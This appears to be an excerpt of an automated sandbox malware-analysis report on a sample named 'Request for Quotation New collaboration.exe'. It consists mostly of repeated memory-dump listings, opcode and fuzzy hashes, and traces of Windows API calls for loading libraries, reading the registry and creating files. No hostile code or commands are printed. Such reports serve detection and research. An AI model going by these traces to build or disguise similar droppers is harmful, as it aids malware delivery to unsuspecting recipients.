                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                                  • Instruction ID: e59bb743c0d69fedc8ec9c1b53f92d0ee49f9853fc7f4c6d73f4ee5c7875ed1f
                                                                                                                                  • Opcode Fuzzy Hash: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                                  • Instruction Fuzzy Hash: FE816671E04228DBDF24CFA8C8447ADBBB0FF44305F15816AD856BB281C7786996DF44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                                                  • Instruction ID: 9556348457f1f5f1301c48e47fc8538a45dff02eab8277f34011f15b85b09a92
                                                                                                                                  • Opcode Fuzzy Hash: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                                                  • Instruction Fuzzy Hash: 43711271E00228DBDF28CF98C854BADBBB1FF48305F15806AD816BB281C7789996DF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                                                  • Instruction ID: ef61438920200bd82941886013112b5956151ce3a95704f571d29bdd470ffe0d
                                                                                                                                  • Opcode Fuzzy Hash: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                                                  • Instruction Fuzzy Hash: FF713571E00228DBDF28CF98C854BADBBB1FF44305F15806AD856BB291C7789996DF44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                                                  • Instruction ID: 0528ad5c4640a45b82c18dce6d1929194436f5f2edf35a138e23b2c729619556
                                                                                                                                  • Opcode Fuzzy Hash: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                                                  • Instruction Fuzzy Hash: AD714671E00228DBDF28CF98C854BADBBB1FF44305F15806AD816BB291C778AA56DF44
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                    • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                    • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                                                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 334405425-0
                                                                                                                                  • Opcode ID: ec4ed1b09714f1aa9f835f2dbd5309446028e52bc8e450eb177df983279e41a5
                                                                                                                                  • Instruction ID: 2e01ab74a4c934f7e6015694823d512690d69bb111ffb1ad89b514660c000c84
                                                                                                                                  • Opcode Fuzzy Hash: ec4ed1b09714f1aa9f835f2dbd5309446028e52bc8e450eb177df983279e41a5
                                                                                                                                  • Instruction Fuzzy Hash: 65219871904215F6CF106F95CE48ADEBAB4AB04358F70417BF601B51E0D7B94D41DA6D
                                                                                                                                  APIs
                                                                                                                                  • GlobalFree.KERNEL32(0073FB78), ref: 00401B92
                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BA4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$AllocFree
                                                                                                                                  • String ID: Call
                                                                                                                                  • API String ID: 3394109436-1824292864
                                                                                                                                  • Opcode ID: fa756fabfd28fe389d560697bb7080b79a52f5873eaf941668f0573c6073e784
                                                                                                                                  • Instruction ID: 0d74e211bf3f77f63613a954a16e526c6d046d9130d490d95d437df5f5263094
                                                                                                                                  • Opcode Fuzzy Hash: fa756fabfd28fe389d560697bb7080b79a52f5873eaf941668f0573c6073e784
                                                                                                                                  • Instruction Fuzzy Hash: 2F2196B2604501ABCB10EB94DE8599FB3A8EB44318B24053BF541B32D1D778AC019FAD
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2037060970.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2037043192.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037076720.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037093643.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnumErrorLastWindows
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 14984897-0
                                                                                                                                  • Opcode ID: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                                                                  • Instruction ID: 346bc7c3d20138bcfc700b2b1684b28c90b224d1e8b0175626a50a5a3d135241
                                                                                                                                  • Opcode Fuzzy Hash: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                                                                  • Instruction Fuzzy Hash: 0E51A2BA905215DFFB10DFA4DC8275937A8EB443D4F22C42AEA049721DCF34A991CB55
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001FA,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso7880.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                  • Opcode ID: 73cf7011403a251bc8a8568549cb6b978d79a09763c44604493d81e759c4a0f6
                                                                                                                                  • Instruction ID: d36666ef43ed86f5efc63e353f879872970ea39244a0d469f35bb849977519d9
                                                                                                                                  • Opcode Fuzzy Hash: 73cf7011403a251bc8a8568549cb6b978d79a09763c44604493d81e759c4a0f6
                                                                                                                                  • Instruction Fuzzy Hash: 3A117371915205EEDF14CFA0C6889AFB7B4EF40359F20843FE042A72D0D7B85A41DB5A
                                                                                                                                  APIs
                                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                  • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                                                                                  • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
                                                                                                                                  • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                                                                                  • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
                                                                                                                                  APIs
                                                                                                                                  • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$EnableShow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1136574915-0
                                                                                                                                  • Opcode ID: be98ff442c713d64b2aef3360118115c19863b97becbdb99d22bcda0d6aeac62
                                                                                                                                  • Instruction ID: 4da21f5269aa326e6de85e385cb401583d451f1930efd1289825586750b78c36
                                                                                                                                  • Opcode Fuzzy Hash: be98ff442c713d64b2aef3360118115c19863b97becbdb99d22bcda0d6aeac62
                                                                                                                                  • Instruction Fuzzy Hash: 84E08CB2B04104DBDB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C008E3E
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Request for Quotation New collaboration.exe,80000000,00000003), ref: 00405B5A
                                                                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 415043291-0
                                                                                                                                  • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                                                  • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                                                                                                  • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                                                  • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                                                                                                    • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FilePointerwsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 327478801-0
                                                                                                                                  • Opcode ID: 9c9351cd5493f6acb52240965b0f8c81d6de1eb3f207cde75e45128e5fdd4ef9
                                                                                                                                  • Instruction ID: 7b0a8f507568a188bd2c0a80d79ed85a493e53c174130335dce059ea839ee6d0
                                                                                                                                  • Opcode Fuzzy Hash: 9c9351cd5493f6acb52240965b0f8c81d6de1eb3f207cde75e45128e5fdd4ef9
                                                                                                                                  • Instruction Fuzzy Hash: 13E01AB1B15114ABDB01ABE59D49CEEB66DEB00319F20043BF101B00D1C27989019E7E
                                                                                                                                  APIs
                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PrivateProfileStringWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 390214022-0
                                                                                                                                  • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                                                  • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                                                                                                  • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
